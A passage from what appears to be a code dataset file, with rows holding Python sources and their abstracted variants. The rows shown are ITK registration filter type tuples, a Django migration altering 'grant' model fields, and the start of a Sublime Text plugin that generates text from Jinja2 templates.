itk::Image< itk::Vector< float,2 >,2 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterIUC3IUC3IVF23', True,\n 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,2 >,3 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterIUC2IUC2IVF32', True,\n 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,3 >,2 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterIUC3IUC3IVF33', True,\n 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,3 >,3 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterIUC2IUC2IVF42', True,\n 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,4 >,2 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterIUC3IUC3IVF43', True,\n 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,4 >,3 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterIUS2IUS2IVF22', True,\n 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,2 >,2 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterIUS3IUS3IVF23', True,\n 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,2 >,3 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterIUS2IUS2IVF32', True,\n 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,3 >,2 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterIUS3IUS3IVF33', True,\n 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,3 >,3 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterIUS2IUS2IVF42', True,\n 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,4 >,2 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterIUS3IUS3IVF43', True,\n 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,4 >,3 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterIF2IF2IVF22', True,\n 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,2 >,2 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterIF3IF3IVF23', True,\n 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,2 >,3 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterIF2IF2IVF32', True,\n 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,3 >,2 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterIF3IF3IVF33', True,\n 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,3 >,3 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterIF2IF2IVF42', True,\n 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,4 >,2 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterIF3IF3IVF43', True,\n 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,4 >,3 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterISS2ISS2IVF22', True,\n 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,2 >,2 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterISS3ISS3IVF23', True,\n 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,2 >,3 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterISS2ISS2IVF32', True,\n 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,3 >,2 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterISS3ISS3IVF33', True,\n 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,3 >,3 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterISS2ISS2IVF42', True,\n 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,4 >,2 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterISS3ISS3IVF43', True,\n 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,4 >,3 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterIUC2IUC2IVF22', True,\n 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,2 >,2 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterIUC3IUC3IVF23', True,\n 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,2 >,3 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterIUC2IUC2IVF32', True,\n 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,3 >,2 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterIUC3IUC3IVF33', True,\n 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,3 >,3 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterIUC2IUC2IVF42', True,\n 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,4 >,2 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterIUC3IUC3IVF43', True,\n 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,4 >,3 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterIUS2IUS2IVF22', True,\n 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,2 >,2 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterIUS3IUS3IVF23', True,\n 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,2 >,3 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterIUS2IUS2IVF32', True,\n 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,3 >,2 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterIUS3IUS3IVF33', True,\n 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,3 >,3 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterIUS2IUS2IVF42', True,\n 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,4 >,2 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterIUS3IUS3IVF43', True,\n 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,4 >,3 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterIF2IF2IVF22', True,\n 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,2 >,2 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterIF3IF3IVF23', True,\n 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,2 >,3 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterIF2IF2IVF32', True,\n 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,3 >,2 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterIF3IF3IVF33', True,\n 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,3 >,3 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterIF2IF2IVF42', True,\n 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,4 >,2 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterIF3IF3IVF43', True,\n 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,4 >,3 >'\n ), ('MultiResolutionPDEDeformableRegistration',\n 'itk::MultiResolutionPDEDeformableRegistration',\n 'itkMultiResolutionPDEDeformableRegistrationIF2IF2IVF22F', True,\n 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,2 >, 2 >, float'\n ), ('MultiResolutionPDEDeformableRegistration',\n 'itk::MultiResolutionPDEDeformableRegistration',\n 'itkMultiResolutionPDEDeformableRegistrationIF3IF3IVF33F', True,\n 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,3 >, 3 >, float'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterISS2ISS2IVF22', True,\n 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,2 >,2 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterISS3ISS3IVF23', True,\n 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,2 >,3 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterISS2ISS2IVF32', True,\n 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,3 >,2 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterISS3ISS3IVF33', True,\n 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,3 >,3 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterISS2ISS2IVF42', True,\n 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,4 >,2 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterISS3ISS3IVF43', True,\n 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,4 >,3 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterIUC2IUC2IVF22', True,\n 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,2 >,2 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterIUC3IUC3IVF23', True,\n 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,2 >,3 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterIUC2IUC2IVF32', True,\n 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,3 >,2 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterIUC3IUC3IVF33', True,\n 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,3 >,3 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterIUC2IUC2IVF42', True,\n 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,4 >,2 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterIUC3IUC3IVF43', True,\n 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,4 >,3 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterIUS2IUS2IVF22', True,\n 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,2 >,2 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterIUS3IUS3IVF23', True,\n 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,2 >,3 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterIUS2IUS2IVF32', True,\n 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,3 >,2 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterIUS3IUS3IVF33', True,\n 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,3 >,3 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterIUS2IUS2IVF42', True,\n 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,4 >,2 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterIUS3IUS3IVF43', True,\n 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,4 >,3 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterIF2IF2IVF22', True,\n 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,2 >,2 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterIF3IF3IVF23', True,\n 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,2 >,3 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterIF2IF2IVF32', True,\n 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,3 >,2 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterIF3IF3IVF33', True,\n 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,3 >,3 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterIF2IF2IVF42', True,\n 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,4 >,2 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterIF3IF3IVF43', True,\n 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,4 >,3 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterISS2ISS2IVF22', True,\n 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,2 >,2 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterISS3ISS3IVF23', True,\n 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,2 >,3 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterISS2ISS2IVF32', True,\n 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,3 >,2 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterISS3ISS3IVF33', True,\n 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,3 >,3 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterISS2ISS2IVF42', True,\n 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,4 >,2 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterISS3ISS3IVF43', True,\n 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,4 >,3 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterIUC2IUC2IVF22', True,\n 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,2 >,2 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterIUC3IUC3IVF23', True,\n 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,2 >,3 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterIUC2IUC2IVF32', True,\n 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,3 >,2 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterIUC3IUC3IVF33', True,\n 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,3 >,3 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterIUC2IUC2IVF42', True,\n 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,4 >,2 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterIUC3IUC3IVF43', True,\n 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,4 >,3 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterIUS2IUS2IVF22', True,\n 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,2 >,2 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterIUS3IUS3IVF23', True,\n 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,2 >,3 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterIUS2IUS2IVF32', True,\n 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,3 >,2 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterIUS3IUS3IVF33', True,\n 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,3 >,3 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterIUS2IUS2IVF42', True,\n 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,4 >,2 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterIUS3IUS3IVF43', True,\n 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,4 >,3 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterIF2IF2IVF22', True,\n 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,2 >,2 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterIF3IF3IVF23', True,\n 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,2 >,3 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterIF2IF2IVF32', True,\n 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,3 >,2 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterIF3IF3IVF33', True,\n 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,3 >,3 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterIF2IF2IVF42', True,\n 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,4 >,2 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterIF3IF3IVF43', True,\n 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,4 >,3 >'\n )\nsnake_case_functions = ('level_set_motion_registration_filter',\n 'pde_deformable_registration_filter',\n 'symmetric_forces_demons_registration_filter',\n 'demons_registration_filter',\n 'multi_resolution_pde_deformable_registration')\n",
"<assignment token>\n"
] | false |
99,859 | c86ad03b01554647f3ccf13758f54ddf2a4dc8fd | # Generated by Django 2.0.1 on 2018-01-14 05:07
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('CapApp', '0026_auto_20180112_1929'),
]
operations = [
migrations.AlterField(
model_name='grant',
name='core_project_num',
field=models.CharField(blank=True, max_length=30, null=True),
),
migrations.AlterField(
model_name='grant',
name='pi_name',
field=models.CharField(blank=True, max_length=500, null=True),
),
]
| [
"# Generated by Django 2.0.1 on 2018-01-14 05:07\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('CapApp', '0026_auto_20180112_1929'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='grant',\n name='core_project_num',\n field=models.CharField(blank=True, max_length=30, null=True),\n ),\n migrations.AlterField(\n model_name='grant',\n name='pi_name',\n field=models.CharField(blank=True, max_length=500, null=True),\n ),\n ]\n",
"from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('CapApp', '0026_auto_20180112_1929')]\n operations = [migrations.AlterField(model_name='grant', name=\n 'core_project_num', field=models.CharField(blank=True, max_length=\n 30, null=True)), migrations.AlterField(model_name='grant', name=\n 'pi_name', field=models.CharField(blank=True, max_length=500, null=\n True))]\n",
"<import token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('CapApp', '0026_auto_20180112_1929')]\n operations = [migrations.AlterField(model_name='grant', name=\n 'core_project_num', field=models.CharField(blank=True, max_length=\n 30, null=True)), migrations.AlterField(model_name='grant', name=\n 'pi_name', field=models.CharField(blank=True, max_length=500, null=\n True))]\n",
"<import token>\n\n\nclass Migration(migrations.Migration):\n <assignment token>\n <assignment token>\n",
"<import token>\n<class token>\n"
] | false |
99,860 | c87411703594d0e2fba963116acecb8bcabf76bb | import json
import sublime
import sublime_plugin
import os
import re
from .jinja2 import Environment
class PluginMixin():
def get_selection(self):
selections = []
for region in self.view.sel():
if not region.empty():
selections.append(region)
if len(selections) == 0:
# select whole document
selections.append(sublime.Region(0, self.view.size()))
return selections
def get_contents(self):
contents = self.view.substr(sublime.Region(0, self.view.size()))
return contents
def write_new_buffer(self, contents, output_suffix=" - output"):
# Create a new output window
buffername = self.view.name()
filename = self.view.file_name()
new_view = self.view.window().new_file()
if buffername:
new_view.set_name(buffername + output_suffix)
elif filename:
basename = os.path.basename(filename)
new_view.set_name(basename + output_suffix)
else:
new_view.set_name('Untitled' + output_suffix)
new_view.set_scratch(True)
new_view.run_command('my_view_command', {'command': 'set_text', 'text': contents})
def raise_err(self, message, exception_cls=None):
exception_cls = exception_cls or Exception
sublime.active_window().run_command("show_panel", {"panel": "console", "toggle": True})
sublime.status_message(message)
raise exception_cls(message)
class Mattmc3CodegenFromJinja2(sublime_plugin.TextCommand, PluginMixin):
def run(self, edit):
sublime.active_window().show_input_panel(
"Jinja2 JSON data",
'''[{"value":"hello"}]''',
on_done=self.make_it_so,
on_change=None,
on_cancel=None)
def make_it_so(self, input):
doc = self.get_contents()
generated = []
# get json data
try:
data = json.loads(input)
except Exception as ex:
self.raise_err(str(ex))
# make sure we can iterate
try:
iter(data)
except TypeError as te:
data = list(data)
try:
for templ_vars in data:
result = Environment().from_string(doc).render(templ_vars)
generated.append(result)
except Exception as ex:
self.raise_err(str(ex))
self.write_new_buffer("\n".join(generated))
class MyViewCommandCommand(sublime_plugin.TextCommand, PluginMixin):
def run(self, edit, **args):
if 'command' not in args:
self.raise_err("No command provided")
if args['command'] == "set_text":
self.view.replace(edit, sublime.Region(0, self.view.size()), args['text'])
else:
self.raise_err("Command not recognized: {}".format(args['command']))
| [
"import json\nimport sublime\nimport sublime_plugin\nimport os\nimport re\nfrom .jinja2 import Environment\n\n\nclass PluginMixin():\n def get_selection(self):\n selections = []\n for region in self.view.sel():\n if not region.empty():\n selections.append(region)\n if len(selections) == 0:\n # select whole document\n selections.append(sublime.Region(0, self.view.size()))\n return selections\n\n def get_contents(self):\n contents = self.view.substr(sublime.Region(0, self.view.size()))\n return contents\n\n def write_new_buffer(self, contents, output_suffix=\" - output\"):\n # Create a new output window\n buffername = self.view.name()\n filename = self.view.file_name()\n new_view = self.view.window().new_file()\n if buffername:\n new_view.set_name(buffername + output_suffix)\n elif filename:\n basename = os.path.basename(filename)\n new_view.set_name(basename + output_suffix)\n else:\n 